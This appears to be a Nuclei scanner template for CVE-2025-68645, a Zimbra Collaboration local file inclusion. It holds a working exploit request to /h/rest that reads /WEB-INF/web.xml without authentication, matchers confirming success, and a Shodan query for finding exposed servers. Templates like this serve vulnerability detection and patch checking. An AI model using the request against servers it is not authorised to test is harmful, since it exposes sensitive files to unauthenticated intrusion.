Zimbra Collaboration (ZCS) 10.0 and 10.1 contain a local file inclusion caused by improper handling of user-supplied parameters in the RestFilter servlet, letting unauthenticated remote attackers include arbitrary files from WebRoot, exploit requires crafted requests to /h/rest endpoint.
PoC代码[已公开]
id: CVE-2025-68645
info:
name: Zimbra Collaboration - Local File Inclusion
author: DhiyaneshDk,sirifu4k1
severity: high
description: |
Zimbra Collaboration (ZCS) 10.0 and 10.1 contain a local file inclusion caused by improper handling of user-supplied parameters in the RestFilter servlet, letting unauthenticated remote attackers include arbitrary files from WebRoot, exploit requires crafted requests to /h/rest endpoint.
impact: |
Unauthenticated remote attackers can include arbitrary files from the WebRoot directory, potentially exposing sensitive information.
remediation: |
Update to the latest version of Zimbra Collaboration.
reference:
- https://x.com/sirifu4k1/status/2006031417088639064
metadata:
max-request: 1
verified: true
shodan-query: http.title:"Zimbra Collaboration Suite"
tags: cve,cve2025,zimbra,zcs,lfi
http:
- method: GET
path:
- "{{BaseURL}}/h/rest?javax.servlet.include.servlet_path=/WEB-INF/web.xml"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<?xml version"
- "web-app>"
- "Zimbra"
condition: and
- type: status
status:
- 200
# digest: 490a00463044022052e3300505df920b00aad5ca8c9b3f98e0f844707396e89a94f97a7a14fb2d53022051009d609de1711aef811f75527300151a53f3595f0d013d2e1936b08896f7d0:922c64590222798bb761d5b6d8e72950